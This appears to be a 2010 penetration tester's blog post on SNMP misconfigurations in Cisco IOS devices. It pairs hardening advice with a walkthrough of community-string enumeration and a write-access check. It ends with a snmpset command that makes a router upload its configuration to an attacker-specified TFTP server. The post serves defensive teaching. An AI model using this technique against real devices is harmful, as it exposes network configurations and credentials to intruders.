Skip to content

Secure Your SNMP!!

by on October 7, 2010

In this post, I’m going to briefly discuss some of the age-old security issues identified with SNMP configurations, specifically on Cisco IOS network devices.  .

SNMP Configuration

Recently, during a number of external tests across the Internet, I’ve gained privileged access to many Cisco IOS devices configured with poor SNMP settings.  And yet the poor SNMP configurations I’ve exploited have been so well documented across the Internet that I’m amazed so many Cisco devices are vulnerable!!  Here are some examples of what SNMP Read-Write access to a Cisco device allows:

  1. Interfaces can be shutdown
  2. Device can be rebooted
  3. IP routes can be changed, removed or added
  4. Device configuration can be uploaded to a TFTP server for further analysis
  5. Device Passwords can be reset

Naturally, none of these should be possible for your Internet-facing devices. :o)

SNMP Default Community Strings – Never ever use them.  Most SNMP devices will default to public for read-only access and private for read-write access. Even if nothing else is done to the SNMP configuration change these values to something strong….throw in lower case, upper case, special characters and make them long!!

SNMP Permissions – If, for network monitoring purposes, you only need to poll SNMP values on your network device then completely disable any read-write access; it’s not needed and should only be enabled if you are making configuration changes to the device.

image 

Cisco IOS configuration snippet #1

This is the worst possible configuration.  Not only is the common public string used, but it allows full read-write access to the device

image

Cisco IOS configuration snippet #2 

Same as above, just don’t bother using this either.  Allows full read-write access using the equally common private string.

image

Cisco IOS configuration snippet #3  

Notice the string is more complex and of reasonable length?  You’ll also see that read-write access has been removed

SNMP Access Filters/Lists – Making sure only legitimate management devices/hosts can access your SNMP-enabled devices is good practice.  Assuming a strong SNMP community string has now been chosen and configured, its worth locking-down the devices to only those devices that need SNMP access.

The Cisco IOS “snmp-server” command allows an IOS standard or extended access list to be specified:

image

image

SNMP Example

After discovering that a device is listening on UDP port 161 (SNMP), an SNMP enumeration tool can be used to extract information from the device.  Tools such as SNMPWalk or SNMPEnum are two that I use regularly.  SNMPWalk queries the device with a standard set of MIBs.  With SNMPEnum you can specify a configuration file supplied with the tool that queries for additional vendor-specific values.  In the case of Cisco, SNMPEnum can return running processes, recent terminal users and the system log (amongst others)

Here a read-only community string of public is being used on Cisco switch 192.168.1.1.  This assumes the SNMP community strings are known…..otherwise you’ll have to guess!!  We can see below that the string worked since the device responded with a series of values:

image

Now lets check if a SNMP read-write access is possible.  Using the same command, just changed the –c switch to  use the read-write community string.  In this example its private; a well known and obvious read-write community string:

image

I now know that private is a valid string since data was returned, but I need to confirm that private is in fact the read-write string.  I can attempt to change a harmless value on the device.  In this case we’ll set the “sysName” value(string) to “PENTURA”.  If accepted by the device, I’ll know that private is the read-write community string:

To make a change via SNMP, I use the tool SNMPSet and specify the Object ID (OID); the numerical representation of “sysName”.  SNMPWalk can be used with the “-On” switch to display OIDs instead:

image

“sysName” is represented as “.1.3.6.1.2.1.1.5.0”.  I’ll use the SNMPSet command to change this value to “PENTURA”.  In the command example below, the “s” instructs SNMPSet that I want to write a string value.

image

So that confirms private is a read-write community string.  Now I can go ahead and extract the IOS configuration.  I start my TFTP server and, using the SNMPSet command, configure the router to upload its configuration to an IP address I specify. 

Here’s an example of the command (I’ll leave you to play!)

#snmpset -v 1 -c <rw-community-string> <target_device_ip> .1.3.6.1.4.1.9.2.1.55.<TFTP_Server_IP> s <local_tftp_filename>

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: